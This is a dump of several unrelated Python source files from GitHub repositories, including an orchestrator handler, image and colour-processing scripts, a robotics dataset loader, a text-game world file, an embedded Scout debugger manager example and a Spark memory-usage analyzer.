ErrorCodes.ErrorNoSuchReservation:\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n res_state = ReservationStates(reservations[0].get_state())\n\n if res_state != ReservationStates.Active:\n raise OrchestratorException(f\"Cannot trigger POA; Reservation# {rid} is not {ReservationStates.Active}\")\n\n if not controller.poa(poa=poa):\n raise OrchestratorException(f\"Failed to trigger POA: \"\n 
f\"{controller.get_last_error().get_status().get_message()}\")\n self.logger.debug(f\"POA {poa.operation}/{sliver_id} added successfully\")\n return poa.poa_id, reservations[0].get_slice_id()\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing poa e: {e}\")\n raise e\n\n def get_poas(self, *, token: str, sliver_id: str = None, poa_id: str = None, states: List[str] = None,\n limit: int = 200, offset: int = 0):\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"poa invoked for Controller: {controller}\")\n\n rid = ID(uid=sliver_id) if sliver_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n email = fabric_token.get_email()\n project, tags, project_name = fabric_token.get_first_project()\n\n poa_states = PoaStates.translate_list(states=states)\n\n auth = AuthAvro()\n auth.name = self.controller_state.get_management_actor().get_name()\n auth.guid = self.controller_state.get_management_actor().get_guid()\n auth.oidc_sub_claim = fabric_token.get_uuid()\n auth.email = fabric_token.get_email()\n\n poa_list = controller.get_poas(rid=rid, poa_id=poa_id, email=email, project_id=project,\n states=states, limit=limit, offset=offset)\n if poa_list is None:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n if controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchPoa:\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n raise OrchestratorException(f\"{controller.get_last_error()}\")\n return ResponseBuilder.get_poa_summary(poa_list=poa_list)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing poa e: {e}\")\n raise e","repo_name":"fabric-testbed/ControlFramework","sub_path":"fabric_cf/orchestrator/core/orchestrator_handler.py","file_name":"orchestrator_handler.py","file_ext":"py","file_size_in_byte":44498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22006458799","text":"import os\nfrom PIL import Image\n\ndef resize_images(folder_path, new_width, new_height):\n for root, dirs, files in os.walk(folder_path):\n for file in files:\n if file.lower().endswith(('.png', '.jpg', '.jpeg', '.gif', '.bmp')):\n file_path = os.path.join(root, file)\n img = Image.open(file_path)\n img_resized = img.resize((new_width, new_height), Image.ANTIALIAS)\n img_resized.save(file_path)\n print(f\"Resized image: {file_path}\")\n\n##### RUN CODE #####\n\nfolder_path = '224x224_icon_synth_rob_adfes_dataset'\n#folder_path = '1_sod_dataset'\n#folder_path = 'batches/1_sod_batches/0_door_window_plan_80_20-06_05_23'\nwidth = 224\nheight = 224\nresize_images(folder_path, width, height)\n","repo_name":"synthline/print2model","sub_path":"1_1_sod_dataset_generator/img_resize.py","file_name":"img_resize.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41243649551","text":"#!/usr/bin/env python3\nimport os\nfrom typing import Optional\nimport json\nimport pickle\nimport yaml\nimport logging\nimport random\n\nimport torch\nfrom torch.utils.data import Dataset\nimport tf_conversions as tfconv\nfrom geometry_msgs.msg import Pose\nfrom PyKDL import *\n\nfrom main_utils import create_tensor_from_trajectory_point, create_shift_tesor\nfrom 
main_utils import LRUCache, create_full_trajectoy_point\n\n\nclass MyDatasetFull(Dataset):\n\n def __init__(self,\n trajectories_path: str,\n generations_path: str,\n trajectory_max_len: Optional[int] = None,\n cache_size: int = 1000\n ) -> None:\n self.trajectory_max_len = trajectory_max_len\n self.idx2data = {}\n for x in sorted(os.listdir(trajectories_path)):\n self.idx2data[len(self.idx2data)] = {\n \"trajectory\": os.path.join(trajectories_path, x),\n \"generation\": os.path.join(\n generations_path,\n f\"generation_logs_file_{x.split('_')[-1]}\"\n )\n }\n self.cacher = LRUCache(cache_size=cache_size)\n\n def __len__(self) -> int:\n return len(self.idx2data) * self.trajectory_max_len\n\n def __getitem__(self, idx: int):\n\n trajectory_idx = idx // self.trajectory_max_len\n pose_idx = idx % self.trajectory_max_len\n cache, exist = self.cacher.get(trajectory_idx)\n if exist:\n (trajectory, generation) = cache\n else:\n try:\n with open(self.idx2data[trajectory_idx][\"trajectory\"], \"rb\") as f:\n trajectory_raw = pickle.load(f)\n trajectory = trajectory_raw\n #trajectory = yaml.safe_load(str(trajectory_raw))\n with open(self.idx2data[trajectory_idx][\"generation\"], \"r\") as f:\n generation = json.load(f)\n except Exception as e:\n logging.warning(f\"Invalid trajectory with exception: {e}\")\n random_item = random.randint(0, self.__len__() - 1)\n return self.__getitem__(random_item)\n\n if generation[\"0\"][\"error_code\"] != 0:\n random_item = random.randint(0, self.__len__() - 1)\n logging.error(\"Invalid trajectory\")\n return self.__getitem__(random_item)\n\n self.cacher.set(trajectory_idx, (trajectory, generation))\n print(trajectory)\n exit(0)\n data = {\n \"trajectory_idx\": trajectory_idx,\n \"pose_idx\": pose_idx,\n \"shift\": create_shift_tesor(generation[\"0\"][\"shift\"]),\n \"features\": [0 for _ in range(35)],\n \"targets\": [0 for _ in range(35)],\n \"mask\": 0,\n }\n\n with open(\"inspect/base_motion\", \"w\") as f:\n for x in range(10):\n print(f\"Step: {x}\", file=f)\n print(trajectory.goal.base_motion.points[x], file=f)\n with open(\"inspect/leg_1\", \"w\") as f:\n for x in range(10):\n print(f\"Step: {x}\", file=f)\n print(trajectory.goal.ee_motion[0].points[x], file=f)\n\n if pose_idx >= len(trajectory.goal.base_motion.points) - 1:\n return data\n\n f_base_motion = trajectory.goal.base_motion.points[pose_idx]\n t_base_motion = trajectory.goal.base_motion.points[pose_idx + 1]\n\n\n T0 = tfconv.fromMsg(f_base_motion.pose)\n T1 = tfconv.fromMsg(t_base_motion.pose)\n\n T0.p[2] = 0\n T0inv = T0.Inverse()\n\n f_base_motion.pose = tfconv.toMsg(T0inv * T0)\n t_base_motion.pose = tfconv.toMsg(T0inv * T1) # To inverse use T0 *T1_new\n\n T0_twist = Twist(\n Vector(\n f_base_motion.twist.linear.x,\n f_base_motion.twist.linear.y,\n f_base_motion.twist.linear.z\n ),\n Vector(\n f_base_motion.twist.angular.x,\n f_base_motion.twist.angular.y,\n f_base_motion.twist.angular.z\n )\n )\n T1_twist = Twist(\n Vector(\n t_base_motion.twist.linear.x,\n t_base_motion.twist.linear.y,\n t_base_motion.twist.linear.z\n ),\n Vector(\n t_base_motion.twist.angular.x,\n t_base_motion.twist.angular.y,\n t_base_motion.twist.angular.z\n )\n )\n\n T0_twist = T0inv * T0_twist\n T1_twist = T0inv * T1_twist\n\n f_base_motion.twist.linear.x = T0_twist.vel[0]\n f_base_motion.twist.linear.y = T0_twist.vel[1]\n f_base_motion.twist.linear.z = T0_twist.vel[2]\n f_base_motion.twist.angular.x = T0_twist.rot[3]\n f_base_motion.twist.angular.y = T0_twist.rot[4]\n f_base_motion.twist.angular.z = 
T0_twist.rot[5]\n\n t_base_motion.twist.linear.x = T1_twist.vel[0]\n t_base_motion.twist.linear.y = T1_twist.vel[1]\n t_base_motion.twist.linear.z = T1_twist.vel[2]\n t_base_motion.twist.angular.x = T1_twist.rot[3]\n t_base_motion.twist.angular.y = T1_twist.rot[4]\n t_base_motion.twist.angular.z = T1_twist.rot[5]\n\n\n\n #print(T0_twist[0])\n #print(dir(T0_twist))\n #print(T0_twist.rot)\n\n return data\n\n data = {\n \"trajectory_idx\": idx,\n \"shift\": create_shift_tesor(generation[\"0\"][\"shift\"]),\n \"points\": [],\n \"masks\": []\n }\n\n print(trajectory)\n\n points = []\n for x in trajectory[\"goal\"][\"base_motion\"][\"points\"]:\n points.append(\n {\n \"step\": len(points),\n \"base_motion\": x\n }\n )\n # Remove constant parameters\n points[-1][\"base_motion\"].pop(\"accel\", None)\n points[-1][\"base_motion\"][\"pose\"][\"position\"].pop(\"z\", None)\n points[-1][\"base_motion\"][\"pose\"][\"orientation\"].pop(\"x\", None)\n points[-1][\"base_motion\"][\"pose\"][\"orientation\"].pop(\"y\", None)\n points[-1][\"base_motion\"][\"twist\"][\"linear\"].pop(\"z\", None)\n points[-1][\"base_motion\"][\"twist\"][\"angular\"].pop(\"x\", None)\n points[-1][\"base_motion\"][\"twist\"][\"angular\"].pop(\"y\", None)\n\n for leg_position in trajectory[\"goal\"][\"ee_motion\"]:\n for idx_tmp, x in enumerate(leg_position[\"points\"]):\n points[idx_tmp][leg_position[\"name\"]] = x\n\n # Remove constant parameters\n points[idx_tmp][leg_position[\"name\"]].pop(\"accel\", None)\n points[idx_tmp][leg_position[\"name\"]][\"pose\"].pop(\n \"orientation\", None\n )\n points[idx_tmp][leg_position[\"name\"]][\"twist\"][\"angular\"].pop(\n \"x\", None\n )\n points[idx_tmp][leg_position[\"name\"]][\"twist\"][\"angular\"].pop(\n \"y\", None\n )\n\n data[\"start_point\"] = create_tensor_from_trajectory_point(\n points[0]\n )[0]\n data[\"real_len\"] = len(points)\n\n for idx_tmp, x in enumerate(points):\n if (\n self.trajectory_max_len is not None and\n idx_tmp >= self.trajectory_max_len\n ):\n break\n #data[\"points\"].append(\n # create_full_trajectoy_point(data[\"shift\"], points[0], x)\n #)\n data[\"points\"].append(\n create_full_trajectoy_point(data[\"shift\"], None, x)\n )\n if (\n self.trajectory_max_len is not None and\n idx_tmp >= self.trajectory_max_len\n ):\n data[\"masks\"].append([0])\n else:\n data[\"masks\"].append([1])\n\n if self.trajectory_max_len is not None:\n while len(data[\"points\"]) < self.trajectory_max_len:\n data[\"points\"].append(\n [0 for x in data[\"points\"][-1]]\n )\n data[\"masks\"].append([0])\n\n data[\"shift\"] = torch.FloatTensor(data[\"shift\"])\n data[\"points\"] = torch.FloatTensor(data[\"points\"])\n data[\"masks\"] = torch.FloatTensor(data[\"masks\"])\n data[\"start_point\"] = torch.FloatTensor(data[\"start_point\"])\n\n return data","repo_name":"pansershrek/RosGateGenerator","sub_path":"main/dataset_way_coord_system.py","file_name":"dataset_way_coord_system.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9788368514","text":"from django import forms\r\nfrom .models import Executor\r\n\r\n\r\nclass ExecutorForm(forms.ModelForm):\r\n class Meta:\r\n model = Executor\r\n fields = '__all__'\r\n def clean(self):\r\n data = self.cleaned_data['app_name']\r\n if data == \"hello\":\r\n raise forms.ValidationError(\"Not a proper titlecased 
string\")\r\n\r\n\r\n\r\n","repo_name":"Shohag-Rana/automation_project","sub_path":"myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6955881968","text":"from xmpp.Stanzas import getAttr, getChild, jidAttr\nimport Event\nfrom debug_utils import *\nfrom wotdecorators import noexcept\nTYPE_NONE = 0\nTYPE_SESSION = 1\nTYPE_MUC = 2\n\nclass Entity:\n count = 0\n\n def __init__(self, type, id):\n Entity.count += 1\n self.type = type\n self.connection = None\n self.id = id\n self.eventDisconnected = Event.Event()\n return\n\n def __del__(self):\n Entity.count -= 1\n\n def onStanza(self, stanza):\n pass\n\n def onDisconnected(self):\n self.connection = None\n self.eventDisconnected()\n return\n\n def onConnected(self):\n pass\n\n def connect(self, connection):\n if connection:\n self.connection = connection\n self.onConnected()\n\n\nclass Session(Entity):\n\n def __init__(self, connection, clan_conference):\n Entity.__init__(self, connection, TYPE_SESSION)\n self.clan_conference = clan_conference\n self.eventMessage = Event.Event()\n self.eventFriendOnline = Event.Event()\n self.eventFriendOffline = Event.Event()\n\n\nclass MUC(Entity):\n\n def __init__(self, id, room):\n Entity.__init__(self, TYPE_MUC, id)\n self.room_jid = room\n self.eventMessage = Event.Event()\n self.eventUserOnline = Event.Event()\n self.eventUserOffline = Event.Event()\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/common/xmpp/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"26496015136","text":"import json\n\nimport pandas as pd\n\nimport os\nimport sys\n\n\nclass Util:\n\n @staticmethod\n def save_pf_as_csv(\n data_df: pd.DataFrame,\n csv_file_name: str,\n relative_path: str\n ):\n script_dir = os.path.abspath(os.path.dirname(sys.argv[0]) or '.')\n proj_root_path = os.path.join(script_dir, '../')\n csv_path = os.path.join(proj_root_path, relative_path)\n data_df.to_csv(os.path.join(csv_path, csv_file_name))\n\n @staticmethod\n def save_dict_as_json(\n data_dict: dict,\n json_file_name: str,\n relative_path: str\n ):\n script_dir = os.path.abspath(os.path.dirname(sys.argv[0]) or '.')\n proj_root_path = os.path.join(script_dir, '../')\n json_path = os.path.join(proj_root_path, relative_path)\n target_path = os.path.join(json_path, json_file_name)\n with open(target_path, \"w\", encoding='utf-8') as json_file:\n json.dump(data_dict, json_file, indent='\\t')\n\n @staticmethod\n def get_json_dict_by_path(\n relative_path: str\n ):\n script_dir = os.path.abspath(os.path.dirname(sys.argv[0]) or '.')\n proj_root_path = os.path.join(script_dir, '../')\n json_path = os.path.join(proj_root_path, relative_path)\n\n try:\n with open(json_path) as json_file:\n json_data: dict = json.load(json_file)\n return json_data\n except Exception as e:\n print(e)\n return None\n","repo_name":"jaeleeps/cs4641-machine-learning","sub_path":"src/preparation/uitl.py","file_name":"uitl.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42778827168","text":"from Room import Room, Connection\nfrom Item import Item\n\n\ndef aelurna_description():\n description = \"Aelurna is a world full of adventures and possiblities.\"\n return description\n\n\ndef 
init_inventory():\n    inv = [Item(\"Dirty Pants\", \"Pants with holes, covered in mud and smelling like a hobo\", \"Clothes\", 4),\n           Item(\"Rusty Dagger\", \"This \\\"dagger\\\" is only about 3 inches long and very rusty\", \"One-Handed\", 2),\n           Item(\"Faded sketching\", \"The flimsy piece of paper is dirty but the sketching of the beautiful \"\n                                   \"young woman looks like it was sketched by a skilled artist.\", \"Misc\")]\n    return inv\n\n\ndef load_rooms():\n    \"\"\"\n    A room has description, technical_notes, objects, npcs, connections\n    A room is a dictionary object with its name as the index\n    and the rest of the items stored as a list\n    \"\"\"\n    items = [Item(\"Rusty Key\", \"a heavy key covered in rust.\", \"Misc\", 1,\n                  \"You found a loose brick on the floor. Uncovering it reveals a key covered in damp mold.\"),\n             Item(\"Smelly sock\", \"a foul smelling moldy sock.\", \"Misc\", 2,\n                  \"In the corner of the room there is a moldy sock. It doesn't look very useful.\")\n             ]\n\n    # name, connecting_room, location, descr, locked=False, toggle_condition=None\n    connections = [Connection(\"Prison cell door\", \"Deep Dungeon Corridor\", \"On the wall\",\n                              \"heavy wooden door wrapped in iron\", True, \"Rusty Cell Key\"),\n                   Connection(\"Prison cell window\", None, \"Opposite the door\", \"small round, barred window. \"\n                              \"No light comes through but you can hear a dripping sound. Unfortunately the window is very small.\", False),\n                   Connection(\"Wide Open Door\", \"Dungeon Corridor\", \"Ready for you\", \"come on through. \", False, \"Open\")\n                   ]\n    rooms = {\n        \"Prisoner's Cell\": Room(\n            \"Prisoner's Cell\",\n            \"The floor of this cramped room is a hard stone surface. There is barely any light. The air is dank, musty and has a smell of death. \"\n            \"In the dim light you can make out chains on the wall.\",\n            \"This is the room where the game starts.\",\n            items, # objects in room\n            None, # NPCs in room\n            connections # Connections to other rooms\n        ),\n        \"Dungeon Corridor\": Room(\n            \"Dungeon Corridor\",\n            \"YOU MADE IT!! \",\n            \"test test\",\n            None, # objects in room\n            None, # NPCs in room\n            None # Connections to other rooms\n        )\n    }\n\n\n    return rooms\n\n# Define the first room. 
Must be available above in load_rooms.\ndef get_first_room():\n return \"Prisoner's Cell\"\n","repo_name":"duncanbeggs/Aelurna","sub_path":"world_data.py","file_name":"world_data.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24994852503","text":"#!/usr/bin/python3\n\nfrom embedded_scout_api import *\nfrom scout_debugger.scout_network import *\nfrom elementals import Prompter, hexDump\n\nimport logging\nimport struct\nimport socket\nimport time\nimport sys\n\n##\n# Main debugging session (example)\n##\ndef startManage(sock_fd, logger):\n logger.info('Starting to manage the embedded Scout')\n\n logger.info('Allocating a remote memory buffer')\n data = sendInstr(sock_fd, instrAlloc(0x100), logger)\n\n memory_addr = struct.unpack(\" [full_scout.bin]')\n print('Exiting')\n exit(1)\n\n##\n# Main function (example)\n##\ndef main(args):\n # Check the arguments\n if len(args) not in [1 + 1, 1 + 2]:\n print(f'Wrong amount of arguments, got {len(args) - 1}, expected 1/2')\n printUsage(args)\n\n # parse the args\n server_ip = args[1]\n\n # open the log\n prompter = Prompter('Scout Manager', [('scout_log.txt', 'a', logging.DEBUG)])\n\n # Check if we need to load the full scout before connecting to it\n if len(args) == 1 + 2:\n scout_path = args[2]\n full_scout = open(scout_path, \"rb\").read()\n remoteLoadServer(server_ip, full_scout, prompter)\n prompter.info(\"Waiting for Scout to fully load\")\n time.sleep(2)\n\n # connect to the server\n prompter.info(\"Connecting to the fully loaded scout\")\n sock_fd = socket.create_connection((server_ip, SCOUT_PORT))\n\n # configure the scout\n setBitness32()\n\n # start the managing session\n startManage(sock_fd, prompter)\n\n prompter.info('Finished Successfully')\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"CheckPointSW/Scout","sub_path":"examples/embedded_scout/manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"76"} +{"seq_id":"16799979943","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom scipy.spatial.distance import cdist\nfrom sklearn.cluster import KMeans\n\n\nclass Img(object):\n def __init__(self, width, height,\n cols, sort_idx, velocity=.2):\n if len(cols) != len(sort_idx):\n raise ValueError('len(cols) should be equal to len(sort_idx)')\n self.iteration = 0\n self.width = width\n self.height = height\n self.pixels = []\n self.cols = cols\n\n for i, c in enumerate(sort_idx):\n x, y = (c // self.height, c % self.height)\n dest_x, dest_y = (i // self.height,\n i % self.height)\n col = self.cols[c, :]\n pixel = Pixel(col, c, x, y, dest_x,\n dest_y, self.width,\n self.height,\n velocity=velocity)\n self.pixels.append(pixel)\n\n def is_done(self):\n return all([x.is_done() for x in self.pixels])\n\n def next_frame(self):\n for pixel in self.pixels:\n pixel.next_position()\n self.iteration += 1\n\n @staticmethod\n def closest_node(node, nodes):\n return nodes[cdist([node], nodes).argmin()]\n\n def create_frame(self):\n img = np.zeros((self.width, self.height, 3))\n expected_coord = set([(x, y)\n for x in range(self.width)\n for y in range(self.height)])\n coordinates = [(x.get_position(), x.ix) for x in self.pixels]\n for i, y in enumerate(coordinates):\n x, ix = y\n print(i)\n xi, yi = x\n col = self.cols[ix, :]\n img[xi, yi] = col\n img = 
cv2.cvtColor(np.uint8(img), cv2.COLOR_HSV2BGR)\n        cv2.imwrite('res/img_{}.png'.format(str(self.iteration).zfill(4)),\n                    img)\n\n\nclass Pixel(object):\n    def __init__(self, bgr, ix, cur_x, cur_y,\n                 dest_x, dest_y, width, height,\n                 velocity=1):\n        self.dest_x = dest_x\n        self.dest_y = dest_y\n        self.ix = ix\n        self.bgr = bgr\n        self.height = height\n        self.width = width\n        self.velocity = velocity\n        self.position = np.array([cur_x, cur_y])\n        self.destination = np.array([dest_x, dest_y])\n\n    def set_position(self, x, y):\n        self.position = np.array([x, y])\n\n    def get_position(self):\n        return (self.position[0],\n                self.position[1])\n\n    def get_destination(self):\n        return (self.destination[0],\n                self.destination[1])\n\n    def get_col(self):\n        return self.bgr\n\n    def next_position(self):\n        if all(self.position == self.destination):\n            return\n        vec_pos_to_dest = self.destination - self.position\n        distance = np.linalg.norm(vec_pos_to_dest)\n\n        if distance < 12:\n            self.position = self.destination  # snap to the destination once close enough\n            return\n        vec_pos_to_dest = vec_pos_to_dest / distance\n\n        # position = self.position + (vec_pos_to_dest *\n        #                             max(1.6, self.velocity *\n        #                                 distance))\n        position = self.position + (vec_pos_to_dest * distance)\n        position = np.uint32(np.round(position))\n        if position[0] > self.width-1:\n            position[0] = self.width-1\n        if position[1] > self.height-1:\n            position[1] = self.height-1\n        if position[0] < 0:\n            position[0] = 0\n        if position[1] < 0:\n            position[1] = 0\n        self.position = position\n        return\n\n    def is_done(self):\n        return all(self.position == self.destination)\n\n\nhash_colorspace = {'hsv': [cv2.COLOR_BGR2HSV, cv2.COLOR_HSV2BGR],\n                   'luv': [cv2.COLOR_BGR2LUV, cv2.COLOR_LUV2BGR],\n                   'hls': [cv2.COLOR_BGR2HLS, cv2.COLOR_HLS2BGR],\n                   'xyz': [cv2.COLOR_BGR2XYZ, cv2.COLOR_XYZ2BGR],\n                   'lab': [cv2.COLOR_BGR2LAB, cv2.COLOR_LAB2BGR],\n                   }\n\n\ndef sort_colors(img_path):\n    kmeans = KMeans(n_clusters=50)\n    bgr_img = cv2.imread(img_path)\n    bgr_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2HSV)\n    width, height, nc = bgr_img.shape\n    img = bgr_img.reshape(width*height, nc)\n\n    clusters_ = kmeans.fit_predict(img)\n    new_img = np.zeros((width*height, nc))\n    for i, x in enumerate(clusters_):\n        new_img[i, :] = kmeans.cluster_centers_[x, :]\n    img = new_img\n    img_sort = np.array(sorted(img, key=lambda k: (k[0], k[2], k[1])))\n    idx_sort = sorted(range(len(img)), key=lambda k: (img[k, 0],\n                                                      img[k, 2],\n                                                      img[k, 1]))\n    # idx_sort = list(range(len(img)))\n    # idx_sort = list(range(len(img)))\n    img_res = img_sort.reshape(width,\n                               height,\n                               nc)\n    new_img = np.zeros((width, height, nc))\n\n    for i, c in zip(idx_sort, img):\n        new_img[i//height, i%height, :] = c\n\n    for c, i in enumerate(idx_sort):\n        new_img[c // height, c % height, :] = img[i, :]\n\n    img_final = new_img\n    img_final = cv2.cvtColor(np.uint8(img_final), cv2.COLOR_HSV2BGR)\n    img_res = cv2.cvtColor(np.uint8(img_res), cv2.COLOR_HSV2BGR)\n    cv2.imwrite('test_idx_sort.png', img_final)\n    cv2.imwrite('test_img_sort.png', img_res)\n    image = Img(width, height, img, idx_sort, velocity=.1)\n    for i in range(1000):\n        image.create_frame()\n        image.next_frame()\n","repo_name":"adrz/sort-colors-image","sub_path":"src/poster_colors.py","file_name":"poster_colors.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12708772527","text":"'''\nRecursive calls and recursive functions\ndef f(i, k):\n    if i == k: # once the target index is reached\n        print(B)\n        return\n    else:\n        B[i] = A[i]\n        f(i+1, k)\n\n\nA = [i for i in range(1000)]\nB = 
[0]*1000\nf(0,1000)\n'''\n\n'''\n7 8\n1 2 1 3 2 4 2 5 4 6 5 6 6 7 3 7\n'''\nV, E = map(int, input().split())\narr = list(map(int, input().split()))\nadjM = [[0]*(V+1) for _ in range(V+1)]\nadjL = [[] for _ in range(V+1)]\n\nfor i in range(E):\n    v1, v2 = arr[i*2], arr[i*2+1] # if you want to take the values out of the pair list two at a time, you can use this kind of indexing\n    adjM[v1][v2] = 1\n    adjM[v2][v1] = 1\n    \n    adjL[v1].append(v2)\n    adjL[v2].append(v1)\n\nprint()","repo_name":"KimBeomGi/STUDYduringSSAFY","sub_path":"python/수업/기록_230214.py","file_name":"기록_230214.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2078293337","text":"# Python program to print all positive numbers in a range\r\n\r\ndef findPos(start, end):\r\n    li = []\r\n    for i in range(start, end+1):\r\n        if i >= 0:\r\n            li.append(i)\r\n\r\n    return li\r\n\r\n\r\nprint(findPos(-4, 5))\r\n","repo_name":"Just2Deep/python_practice","sub_path":"Practice/Practice25.py","file_name":"Practice25.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33801554733","text":"import sys\nimport json\nimport io\nimport gzip\nimport uuid\nimport math\n\nfrom datetime import timedelta\n\nimport scipy.integrate as integrate\nimport scipy.special as special\nimport numpy as np\n\nfrom pyspark_cassandra import CassandraSparkContext\nfrom pyspark_cassandra import RowFormat\nfrom pyspark import SparkConf\n\n#Return the byte size from the string defining the memory limit of a container (e.g. 2g, 2gb, ...) \ndef byteSizeFromString(arg):\n    arg = arg.replace(\" \", \"\")\n    mUnit = \"\"\n    if not arg[-1].isdigit() and not arg[-2].isdigit():\n        mUnit = arg[-2:]\n        mUnit = mUnit.lower()\n    elif not arg[-1].isdigit() and arg[-2].isdigit():\n        mUnit = arg[-1]\n        mUnit = mUnit.lower()\n    elif arg.isdigit():\n        return long(arg)\n    else:\n        return None\n    # strip exactly as many trailing characters as the unit has, so both \"2g\" and \"2gb\" parse\n    if \"kb\" in mUnit or \"k\" in mUnit:\n        return long(arg[:-len(mUnit)]) *1024\n    elif \"mb\" in mUnit or \"m\" in mUnit:\n        return long(arg[:-len(mUnit)]) *1024 *1024\n    elif \"gb\" in mUnit or \"g\" in mUnit:\n        return long(arg[:-len(mUnit)]) *1024 *1024 *1024\n    elif \"tb\" in mUnit or \"t\" in mUnit:\n        return long(arg[:-len(mUnit)]) *1024 *1024 *1024 *1024\n    else:\n        return long(arg[:-len(mUnit)])\n    \n#Compute the absolute efficiency of the RAM\ndef absoluteRamEfficency(sc, cassandraKeyspace, trialID, experimentID, containerID, hostID, dataIntegral, dataPoints):\n    # Taking from the container properties\n    containerProperties = sc.cassandraTable(cassandraKeyspace, \"container_properties\") \\\n        .select(\"mem_limit\") \\\n        .where(\"trial_id=? AND experiment_id=? AND container_id=? 
AND host_id=?\", trialID, experimentID, containerID, hostID) \\\n .first()\n maxMemory = containerProperties[\"mem_limit\"]\n # If Docker returns memory as either 0 or -1 it means unlimited memory given to the container, so we need the host memory\n if maxMemory is not None:\n byteSizeFromString(maxMemory)\n if maxMemory is None or maxMemory < 1:\n hostProperties = sc.cassandraTable(cassandraKeyspace, \"host_properties\") \\\n .select(\"mem_total\") \\\n .where(\"host_id=?\", hostID) \\\n .first()\n maxMemory = hostProperties[\"mem_total\"]\n if maxMemory is None:\n return None\n absoluteEfficency = dataIntegral/float(long(maxMemory)*dataPoints)\n return absoluteEfficency\n\n#Create the queries containg the results of the computations to pass to Cassandra\ndef createQuery(dataRDD, sc, cassandraKeyspace, experimentID, trialID, containerID, containerName, hostID):\n from commons import computeMode, computeMetrics\n \n mode = computeMode(dataRDD)\n \n data = dataRDD.map(lambda x: x[0]).collect()\n \n metrics = computeMetrics(data)\n relativeEfficency = metrics[\"integral\"]/(metrics[\"max\"]*metrics[\"num_data_points\"])\n absoluteEfficency = absoluteRamEfficency(sc, cassandraKeyspace, trialID, experimentID, containerID, hostID, metrics[\"integral\"], metrics[\"num_data_points\"])\n \n query = [{\"experiment_id\":experimentID, \"trial_id\":trialID, \"container_id\":containerID, \"container_name\":containerName, \"host_id\":hostID, \\\n \"ram_mode\":mode[0], \"ram_mode_freq\":mode[1], \"ram_integral\":metrics[\"integral\"], \\\n \"relative_efficency\":relativeEfficency, \"absolute_efficency\":absoluteEfficency, \\\n \"ram_mean\":metrics[\"mean\"], \"ram_num_data_points\":metrics[\"num_data_points\"], \\\n \"ram_min\":metrics[\"min\"], \"ram_max\":metrics[\"max\"], \"ram_sd\":metrics[\"sd\"], \"ram_variance\":metrics[\"variance\"], \\\n \"ram_q1\":metrics[\"q1\"], \"ram_q2\":metrics[\"q2\"], \"ram_q3\":metrics[\"q3\"], \"ram_p95\":metrics[\"p95\"], \\\n \"ram_me\":metrics[\"me\"], \"ram_ci095_min\":metrics[\"ci095_min\"], \"ram_ci095_max\":metrics[\"ci095_max\"], \\\n \"ram_p90\":metrics[\"p90\"], \"ram_p99\":metrics[\"p99\"], \"ram_percentiles\":metrics[\"percentiles\"]}]\n return query\n\ndef main():\n #Takes arguments\n args = json.loads(sys.argv[1])\n trialID = str(args[\"trial_id\"])\n experimentID = str(args[\"experiment_id\"])\n configFile = str(args[\"config_file\"])\n containerID = str(args[\"container_id\"])\n containerName = str(args[\"container_name\"])\n hostID = str(args[\"host_id\"])\n cassandraKeyspace = str(args[\"cassandra_keyspace\"])\n partitionsPerCore = 5\n \n # Set configuration for spark context\n conf = SparkConf().setAppName(\"Ram trial analyser\")\n sc = CassandraSparkContext(conf=conf)\n \n #Source and destination tables\n srcTable = \"environment_data\"\n destTable = \"trial_ram\"\n \n #Obtain data for computations\n dataRDD = sc.cassandraTable(cassandraKeyspace, srcTable) \\\n .select(\"memory_usage\") \\\n .where(\"trial_id=? AND experiment_id=? AND container_id=? 
